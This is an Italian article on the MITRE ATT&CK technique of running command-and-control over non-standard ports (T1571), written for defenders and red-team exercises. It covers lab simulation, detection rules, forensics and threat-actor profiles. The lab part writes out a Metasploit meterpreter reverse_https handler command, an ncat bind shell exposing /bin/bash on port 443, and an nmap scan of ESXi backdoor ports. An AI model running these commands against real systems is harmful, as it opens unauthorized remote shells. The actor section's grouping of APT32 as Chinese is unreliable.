Porte Fuori Catalogo: Non-Standard Port (T1571)

L'obiettivo in laboratorio è dimostrare quanto sia facile bypassare i controlli perimetrali semplicemente spostando un protocollo su una porta non standard, e quanto sia critico avere deep packet inspection piuttosto che affidarsi a regole basate solo su numeri di porta.

Il primo scenario simula un canale C2 HTTP su porta alta. Con Covenant (open source), un framework C2 scritto in .NET, è possibile configurare un listener HTTP su qualsiasi porta. Dalla console di gestione si crea un listener specificando la porta desiderata — ad esempio 25667 o 47000, come osservato nella campagna Operation Wocao (C0014). Il traffico appare come normali richieste HTTP ma transita su una porta che la maggior parte dei firewall non filtra.

Un secondo scenario, più realistico, sfrutta il mismatch protocollo-porta. Con Metasploit Framework (open source), si può configurare un reverse HTTPS handler su porta 8080:

msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_https; set LHOST <IP_C2>; set LPORT 8080; run"

Il traffico TLS sulla porta 8080 è perfettamente valido a livello TCP, ma un firewall che si limita a classificare la 8080 come "HTTP proxy" non ispezioni il payload crittografato. Questo è esattamente il pattern utilizzato da PingPull e Raspberry Robin.

Per simulare il pattern FakeTLS — traffico che sembra TLS ma non lo è, come fanno HOPLIGHT, HARDRAIN e BADCALL — si può usare ncat (open source, parte di Nmap):

ncat --listen 443 --exec "/bin/bash"

Lato client, la connessione sulla 443 appare come traffico HTTPS a un'ispezione superficiale, ma trasporta una shell interattiva senza alcun handshake TLS reale.

Per scenari ESXi, come quelli di VIRTUALPITA e VIRTUALPIE, è utile verificare quali porte non standard sono raggiungibili dall'esterno. Con Nmap (open source):

nmap -sS -p 2233,7475,18098,546,45678 <target_esxi>

La checklist di validazione per il report dell'esercizio dovrebbe includere:

• Porta non standard raggiungibile dall'esterno → segmentazione assente
• Traffico non ispezionato dal proxy/NGFW → DPI non configurato
• Nessun alert SIEM generato → detection gap confermato
• Processo legittimo (svchost, httpd) che binda una porta anomala → application whitelisting assente

La detection di Non-Standard Port richiede un cambio di paradigma: non si tratta di bloccare singole porte, ma di costruire una baseline di comportamento di rete e segnalare le deviazioni. I dati forniti dalla strategia di detection DET0227 sono chiari: servono log di processo correlati con connessioni di rete, su ogni piattaforma.

Su Windows (AN0633), la coppia vincente è Sysmon EventID 3 (Network Connection) correlato con EventID 1 (Process Create). L'analisi che produce valore reale è: un processo noto — svchost.exe, un'applicazione Office, un servizio di sistema — che apre una connessione outbound verso una porta non presente nella baseline aziendale. Il tuning è fondamentale: definire una whitelist di porte standard (80, 443, 22, 53, 389, 636) e una di processi autorizzati a usare porte non standard (applicazioni custom, agent di monitoraggio). Tutto il resto genera alert. La finestra di correlazione tra creazione processo e connessione di rete dovrebbe essere calibrata sull'ambiente, tipicamente entro 30-60 secondi.

Una regola Sigma efficace filtra connessioni outbound dove DestinationPort non è nella lista delle porte approvate e Image non è nella lista dei processi autorizzati. Il campo DestinationPort di Sysmon è il punto cardine.

Su Linux (AN0634), la strategia ruota attorno ad auditd con regole SYSCALL per le chiamate bind e connect. Una regola auditd mirata:

-a always,exit -F arch=b64 -S connect -F a2!=16 -k nonstandard_port

Questa cattura ogni connect() syscall, ma il volume è alto: il tuning tramite esclusione dei servizi enterprise autorizzati (AllowedServices) è imperativo. Un indicatore complementare potente è l'entropia del payload: traffico su porta 443 che non ha l'entropia tipica di TLS (struttura dell'handshake, certificate exchange) è sospetto — è il segnale del pattern FakeTLS.

Su macOS (AN0635), l'Unified Log cattura connessioni di rete delle applicazioni. La baseline deve includere le porte usate dai servizi Apple nativi (AirDrop, Bonjour, mDNS) per evitare falsi positivi strutturali.

Per gli ambienti ESXi (AN0636), i log vpxd e l'output di esxcli network rivelano processi come vpxa o hostd che comunicano su porte non previste dalla documentazione VMware. Le porte 2233, 7475 e 18098 usate da VIRTUALPITA sono un esempio diretto.

La gestione dei falsi positivi è il vero costo operativo. Applicazioni di sviluppo, VPN custom e tool di gestione remota usano legittimamente porte non standard. La raccomandazione è mantenere un registro vivo delle eccezioni, revisionato trimestralmente, e di non sopprimere mai l'alert ma piuttosto di abbassarne la severità per i processi conosciuti.

Quando si analizza un'intrusione che ha sfruttato porte non standard, la ricostruzione della timeline parte dalla rete e converge sull'endpoint. Il primo artefatto da acquisire è il log del firewall perimetrale: connessioni outbound su porte alte (sopra 10000) o su porte note con protocolli inattesi. Nelle campagne documentate, le porte variano enormemente — dalla 1224 di BeaverTail e InvisibleFerret alla 51640 di Rocke, dalla 4585 di SUGARUSH alla 46769 di GravityRAT — ma il pattern è costante: traffico C2 mascherato.

Su Windows, gli artefatti chiave sono tre. Primo, i log Sysmon EventID 3 conservati nei log eventi: mostrano processo sorgente, IP di destinazione e porta. Un svchost.exe che contatta un IP esterno sulla porta 50000 (come fa Emotet) è un indicatore ad alta confidenza. Secondo, la ShimCache (AppCompatCache) e l'Amcache: registrano l'esecuzione dei binari malware che hanno generato il traffico anomalo. Terzo, le chiavi di registro che configurano porte non standard — la tecnica T1571 menziona esplicitamente che gli avversari possono modificare Registry keys per alterare l'associazione protocollo-porta. I percorsi da esaminare includono le configurazioni dei servizi sotto HKLM\SYSTEM\CurrentControlSet\Services e le chiavi specifiche delle applicazioni compromesse.

Su Linux, il punto di partenza sono i log di auditd con le syscall bind e connect. Il comando:

ausearch -sc connect -ts recent

filtra le connessioni recenti e mostra UID, PID e indirizzo di destinazione con porta. Per sistemi compromessi dove auditd non era configurato, i netfilter logs (se abilitati) o i log di iptables/nftables con regole di LOG sono l'alternativa. Su ambienti con osquery (open source) installato, la tabella process_open_sockets incrociata con processes ricostruisce chi stava ascoltando o connettendo su quali porte in un dato momento.

Per gli ambienti ESXi, le backdoor come VIRTUALPITA (porte 2233, 7475, 18098) e VIRTUALPIE (porta 546) creano listener persistenti. I file di configurazione degli hypervisor e i log vpxd contengono tracce dell'attivazione di queste porte. La timeline deve includere il timestamp di prima apparizione della porta anomala nei log di rete e correlare con modifiche ai file di configurazione sull'host ESXi.

Un approccio strutturato alla timeline prevede: identificazione delle porte anomale nei log di rete → correlazione con processi endpoint tramite Sysmon/auditd → ricerca del binario responsabile nel filesystem → analisi delle modifiche di configurazione (registro, crontab, launch agents) che hanno reso la porta persistente → ricostruzione della catena completa dal primo contatto C2 al momento del contenimento.

La tecnica T1571 è trasversale a un ecosistema di threat actor estremamente eterogeneo, ma un'analisi attenta dei dati rivela pattern geografici e operativi precisi.

Lazarus Group (G0032) adotta un approccio sofisticato: il malware contiene una lista ordinata di porte tra cui scegliere dinamicamente, creando port-protocol mismatch che cambiano tra sessioni. Questo rende la detection basata su singola porta inutile e impone un approccio comportamentale. Il loro ecosistema di tool include HOPLIGHT, HARDRAIN, BADCALL e TYPEFRAME, tutti accomunati dall'uso della tecnica FakeTLS — traffico che simula un handshake TLS sulla porta 443 senza implementarlo realmente. Questo cluster di tool è un fingerprint operativo distintivo dell'apparato cyber nordcoreano. La campagna Contagious Interview (G1052), anch'essa legata all'ecosistema nordcoreano, usa BeaverTail e InvisibleFerret con porte specifiche (1224, 1244, 2245, 8637) per le comunicazioni C2.

FIN7 (G0046) dimostra come anche gruppi a motivazione finanziaria sfruttino questa tecnica. Usano port-protocol mismatch sulle porte 53, 80, 443 e 8080 — porte "lecite" ma con protocolli incoerenti — oltre a porte operative come 59999 e 9898 per regole firewall. Il loro approccio mira a confondersi nel traffico legittimo piuttosto che nascondersi su porte oscure.

Il cluster cinese è il più rappresentato. APT32 (G0050) configura le backdoor con porte HTTP estreme come la 14146. APT33 (G0064), di matrice iraniana ma con TTP simili, usa HTTP sulle porte 808 e 880. RedEcho (G1042) predilige la 8080 per HTTP, come documentato nella campagna Indian Critical Infrastructure Intrusions (C0043) contro le infrastrutture elettriche indiane. Velvet Ant (G1047) usa porte alte randomizzate per i listener PlugX, rendendo la detection per porta singola impossibile. La campagna Quad7 Activity (C0055) illustra un modello infrastrutturale diverso: una botnet di router SOHO compromessi che espone porte caratteristiche (7777, 63256) come punti di accesso proxy per operazioni di password-spraying condotte da attori cinesi.

Il pattern di Sandworm Team (G0034) — porta 6789 per SSH — e di Gamaredon Group (G0047) — porta 6856 per C2 — riflette l'approccio diretto degli attori legati alla Federazione Russa. DarkVishnya (G0105), specializzato in attacchi fisici al settore finanziario, utilizza un ventaglio di porte (5190, 7900, 4444, 4445, 31337) che rivela un kit operativo modulare con componenti separati per shellcode delivery e C2.

Il trend emergente, visibile nelle campagne RedPenguin (C0056) e KV Botnet Activity (C0035), è lo spostamento verso dispositivi di rete (router Juniper, SOHO equipment) dove le porte non standard su dispositivi edge sono ancora meno monitorate che sugli endpoint tradizionali.

Framework MITRE ATT&CK v16 — T1571 (Non-Standard Port), TA0011 (Command and Control). Campagne: C0014 (Operation Wocao), C0018, C0032, C0035 (KV Botnet Activity), C0043 (Indian Critical Infrastructure Intrusions), C0055 (Quad7 Activity), C0056 (RedPenguin). Mitigazioni M1030, M1031. Detection DET0227 (AN0633–AN0636). Integrato con conoscenza professionale per tool e procedure operative.